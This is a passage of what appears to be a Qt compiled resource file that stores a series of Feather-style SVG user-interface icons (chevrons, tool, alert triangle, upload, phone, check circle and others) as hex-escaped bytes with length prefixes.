\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x35\x20\x33\x20\x31\x39\x20\x31\x32\x20\x35\x20\x32\x31\
\x20\x35\x20\x33\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x31\x20\
\x31\x32\x20\x36\x20\x37\x20\x31\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x38\x20\x31\x32\
\x20\x31\x33\x20\x37\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x82\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x6f\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x2e\x37\x20\
\x36\x2e\x33\x61\x31\x20\x31\x20\x30\x20\x30\x20\x30\x20\x30\x20\
\x31\x2e\x34\x6c\x31\x2e\x36\x20\x31\x2e\x36\x61\x31\x20\x31\x20\
\x30\x20\x30\x20\x30\x20\x31\x2e\x34\x20\x30\x6c\x33\x2e\x37\x37\
\x2d\x33\x2e\x37\x37\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x2d\
\x37\x2e\x39\x34\x20\x37\x2e\x39\x34\x6c\x2d\x36\x2e\x39\x31\x20\
\x36\x2e\x39\x31\x61\x32\x2e\x31\x32\x20\x32\x2e\x31\x32\x20\x30\
\x20\x30\x20\x31\x2d\x33\x2d\x33\x6c\x36\x2e\x39\x31\x2d\x36\x2e\
\x39\x31\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x20\x37\x2e\x39\
\x34\x2d\x37\x2e\x39\x34\x6c\x2d\x33\x2e\x37\x36\x20\x33\x2e\x37\
\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x8d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\
\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\
\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\
\x31\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\
\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\
\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x1a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x63\x74\x69\x76\
\x69\x74\x79\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x32\x32\x20\x31\x32\x20\x31\x38\x20\
\x31\x32\x20\x31\x35\x20\x32\x31\x20\x39\x20\x33\x20\x36\x20\x31\
\x32\x20\x32\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x02\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x69\x72\x63\x6c\
\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xa8\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x74\x72\x69\x61\x6e\x67\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x30\x2e\x32\x39\x20\x33\x2e\x38\x36\x4c\
\x31\x2e\x38\x32\x20\x31\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x31\x2e\x37\x31\x20\x33\x68\x31\x36\x2e\x39\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x37\x31\x2d\x33\x4c\
\x31\x33\x2e\x37\x31\x20\x33\x2e\x38\x36\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x2d\x33\x2e\x34\x32\x20\x30\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\
\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x69\x64\x65\x62\
\x61\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\
\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\
\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\
\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x6c\x70\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x2e\x30\x39\x20\x39\
\x61\x33\x20\x33\x20\x30\x20\x30\x20\x31\x20\x35\x2e\x38\x33\x20\
\x31\x63\x30\x20\x32\x2d\x33\x20\x33\x2d\x33\x20\x33\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x37\x22\x20\x78\x32\x3d\x22\
\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x6f\x74\x61\x74\
\x65\x2d\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x34\x20\x32\x33\x20\
\x31\x30\x20\x31\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x30\x2e\x34\x39\x20\x31\x35\x61\x39\x20\x39\x20\x30\x20\x31\x20\
\x31\x2d\x32\x2e\x31\x32\x2d\x39\x2e\x33\x36\x4c\x32\x33\x20\x31\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x70\x6c\x6f\x61\
\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\
\x31\x35\x76\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x76\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x37\x20\x38\x20\x31\x32\x20\x33\x20\x37\x20\x38\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x33\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x69\x6e\x63\x6f\x6d\x69\x6e\x67\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\
\x32\x20\x31\x36\x20\x38\x20\x32\x32\x20\x38\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\
\x31\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\
\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\
\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\
\x38\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\
\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\
\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\
\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\
\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\
\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\
\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\
\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\
\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x32\x32\x20\x31\x31\x2e\x30\x38\x56\x31\x32\x61\x31\
